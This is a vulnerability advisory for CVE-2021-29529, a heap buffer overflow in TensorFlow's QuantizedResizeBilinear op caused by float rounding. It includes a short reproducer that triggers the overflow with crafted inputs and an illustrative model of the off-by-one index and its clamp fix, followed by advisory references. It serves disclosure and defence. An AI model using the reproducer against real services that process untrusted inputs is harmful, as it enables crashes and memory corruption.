CVE-2021-29529: Heap buffer overflow caused by rounding
An attacker can trigger a heap buffer overflow in tf.raw_ops.QuantizedResizeBilinear by manipulating input values so that float rounding results in an off-by-one error when accessing image elements:
```python
import tensorflow as tf

# Reproducer from the advisory: a single-row quantized image of 15 elements,
# resized to 12x6 with both align_corners and half_pixel_centers enabled.
l = [256, 328, 361, 17, 361, 361, 361, 361, 361, 361, 361, 361, 361, 361, 384]
images = tf.constant(l, shape=[1, 1, 15, 1], dtype=tf.qint32)
size = tf.constant([12, 6], shape=[2], dtype=tf.int32)
# Quantization range; variables renamed so they do not shadow Python's builtins.
min_range = tf.constant(80.22522735595703)
max_range = tf.constant(80.39215850830078)
tf.raw_ops.QuantizedResizeBilinear(images=images, size=size, min=min_range, max=max_range,
                                   align_corners=True, half_pixel_centers=True)
```
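The index arithmetic behind such an overflow, as an added illustration that is not TensorFlow's own code: it models the lower/upper source indices a bilinear resize derives for the width dimension of the reproducer above (15 columns to 6) and shows that, without clamping, the upper index reaches 15 in a 15-element row, which is the off-by-one that a bounds clamp prevents. The scale and coordinate rules are assumptions modelled on the usual align_corners and half_pixel_centers conventions, not copied from the op.

```python
import math


def resize_scale(in_size: int, out_size: int, align_corners: bool) -> float:
    """Source-to-destination scale (assumption: the usual align_corners rule)."""
    if align_corners and out_size > 1:
        return (in_size - 1) / (out_size - 1)
    return in_size / out_size


def source_coordinate(i: int, scale: float, half_pixel_centers: bool) -> float:
    """Continuous source coordinate for output index i (assumed convention)."""
    return (i + 0.5) * scale - 0.5 if half_pixel_centers else i * scale


def interpolation_indices(in_size, out_size, align_corners, half_pixel_centers, clamp):
    """Return (lower, upper) source index pairs for every output pixel.

    With clamp=False the upper index comes straight from ceil(), which is the
    shape of the off-by-one described above; with clamp=True both indices are
    forced into [0, in_size - 1] before they would be used to read the row.
    """
    scale = resize_scale(in_size, out_size, align_corners)
    pairs = []
    for i in range(out_size):
        src = source_coordinate(i, scale, half_pixel_centers)
        lower = max(int(math.floor(src)), 0)
        upper = int(math.ceil(src))
        if clamp:
            lower = min(lower, in_size - 1)
            upper = min(max(upper, 0), in_size - 1)
        pairs.append((lower, upper))
    return pairs


def out_of_range(pairs, in_size):
    """List (output_index, lower, upper) entries that would read past the row."""
    return [(i, lo, hi) for i, (lo, hi) in enumerate(pairs)
            if not (0 <= lo < in_size and 0 <= hi < in_size)]


if __name__ == "__main__":
    # Width dimension of the reproducer: 15 input columns resized to 6, both flags set.
    unsafe = interpolation_indices(15, 6, True, True, clamp=False)
    print(out_of_range(unsafe, 15))  # [(5, 14, 15)]: index 15 in a 15-wide row
    safe = interpolation_indices(15, 6, True, True, clamp=True)
    print(out_of_range(safe, 15))    # []
```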
References
- github.com/advisories/GHSA-jfp7-4j67-8r3q
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-457.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-655.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-166.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/commit/f851613f8f0fb0c838d160ced13c134f778e3ce7
- github.com/tensorflow/tensorflow/security/advisories/GHSA-jfp7-4j67-8r3q
- nvd.nist.gov/vuln/detail/CVE-2021-29529